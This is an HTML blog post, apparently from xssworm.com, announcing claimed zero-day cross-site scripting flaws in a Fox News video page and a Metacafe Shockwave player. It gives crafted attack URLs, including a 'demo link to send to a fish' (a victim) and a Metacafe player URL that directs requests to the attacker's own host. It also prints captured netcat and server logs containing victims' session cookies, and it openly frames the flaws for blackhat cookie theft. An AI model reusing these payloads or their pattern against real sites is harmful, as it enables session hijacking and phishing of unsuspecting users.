<div><a href="http://www.foxnews.com/video2/launchPage.html?100207/100207_imag_PETITE&%253Ch1%253E%253Ca%2520href=//xssworm.com%253EXSS%2520Worm%2520Web%25202.0%2520Security%2520Portal%253C/a%253E%253Cbr%253E%253C/h1%253EWith%2520new%25200day%2520Fox%2520News%2520XSS%2520Hacking%2520Video!">
Foxnews 0day XSS Shock Attack<br></a><br><font size="4">Demo link to send to a fish:<br><br><a href="http://www.foxnews.com/video2/launchPage.html?http://localhost/">http://www.foxnews.com/video2/launchPage.html?http://localhost/
</a><br><br>With netcat listen on localhost :</font><br><br>listening on [any] 80 ...<br>connect to localhost [<a href="http://127.0.0.1">127.0.0.1</a>] from localhost [<a href="http://127.0.0.1">127.0.0.1</a>] 1964<br>GET /E05510/a3/0/3/1380/1/0/116282DDC64/0/0/00000000/312340660.gif?D=DM%5FLOC%3D
<br>http%3A%2F%2Fwww%252Efoxnews%252Ecom%2Fvideo2%2FlaunchPage%252Ehtml%253Fhttp%3A%<br>2F%2Flocalhost%2526pageType%253Dmisc%2526miscPage%253DVideo%252520Launch%252520P<br>age%26DM%5FREF%3D%26DM%5FTIT%3DFOXNews%252Ecom%20%2D%20Video%20Launch%20Page%20%
<br>2D%20FOXNews%252Ecom%26DM%5FEOM%3D1 HTTP/1.1<br>Host: <a href="http://pix01.revsci.net">pix01.revsci.net</a><br>User-Agent: Mozilla/5.0 (Mandriver)<br>Accept: image/png,*/*;q=0.5<br>Accept-Language: en-us,en;q=0.5<br>
Accept-Encoding: gzip,deflate<br>Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7<br>Keep-Alive: 300<br>Connection: keep-alive<br>Referer: <a href="http://www.foxnews.com/video2/launchPage.html?http://localhost">http://www.foxnews.com/video2/launchPage.html?http://localhost
</a><br><strong>Cookie: NETID01=9mWO-Ar@1RoAAAm1AWEAAAC5; NETSEGS_J05532=960C7930BE970CE4&J05532<br>&3F149836&472757D9&0&&4723FE85&C2C6A1738F3B885FCA46DE74CFF355ED</strong><br><br><br>I think maybe this is to make many shock waves with XSS !
</div>
<div>
<h3 class="storytitle"><a title="Permanent Link: Zero Day Shockwave SWF Player Exploit with XSS Attack" href="http://xssworm.blogvis.com/12/xssworm/zero-day-shockwave-swf-player-exploit-with-xss-attack/" rel="bookmark">Zero Day Shockwave SWF Player Exploit with XSS Attack
</a></h3>
<h3 class="storytitle"><br><font size="2">in the hacking metacafe we discover Shockwave XSS 0day attack to use by blackhat to steal fish:<br><br>MetaCafe XSS Worm Vulnerabilities - ZeroDay Shockwave Attack POC - :<br></font>
<br><font size="1"><a href="http://www.metacafe.com/f/fvp/EmbedVideoPlayer_5.1.0.0.swf?itemID=755028&mediaURL=http://xssworm.com/?fish&normalizedTitle=space_trip&isViral=false&isWatermarked=false&postrollContentURL=http://l3images.metacafe.com/f/fvp/EmbedItemSelector_3.0.0.5.swf&networkingAllowed=true">
http://www.metacafe.com/f/fvp/EmbedVideoPlayer_5.1.0.0.swf?itemID=755028&mediaURL=http://xssworm.com/?fish&normalizedTitle=space_trip&isViral=false&isWatermarked=false&postrollContentURL=http://l3images.metacafe.com/f/fvp/EmbedItemSelector_3.0.0.5.swf&networkingAllowed=true
</a>&<br><br></font>We see this outputs in <a href="http://xssworm.com">xssworm.com</a> log - :<br><br><br><font size="1">GET /crossdomain.xml HTTP/1.1<br>Host: <a href="http://metacafe.122.2o7.net">metacafe.122.2o7.net
</a><br>Cookie: s_vi_xxhybx7BxBxxclx7Fx7D=[CS]v4|472A0D2D00060B2-290B2900004DB|472A0<br>D2D[CE]; s_vihfex7Ekx7Dx7Fzxx=[CS]v4|47208A0C00004D74-A170C5400003A87|472DA4DB[<br>CE]; s_vi_jdghjlgdijg=[CS]v4|472605E00007606-A170BAE0000639DC|4726056DCE] s_vi
<br>_wzvqcdsx7F7×60qx7isx7Fx7D[CS]v4|.....<br><br>snips…<br><br></font>We see many more serious vulnerability in the web 2.0 today. As you must be sure to visit <a href="http://xssworm.com/">http://xssworm.com/</a> security portal to discuss this shock problem && many thanks for your reply. I am interested.
<br><br>*vaj<br><br><br><font face="courier new,monospace" size="1">-- <br>Francesco Vaj [CISSP - GIAC]<br>CSS Security Researcher<br>mailto:<a href="mailto:vaj@nospam.xssworm.com">vaj@nospam.xssworm.com</a><br>aim: XSS Cross Site
<br>------<br>XSS Cross Site Scripting Attacks and<br>Web 2.0 AJAX Security Information News -<br><a href="http://xssworm.com/">http://xssworm.com/</a><br>------<br>"Vaj, bella vaj."<br></font></h3></div>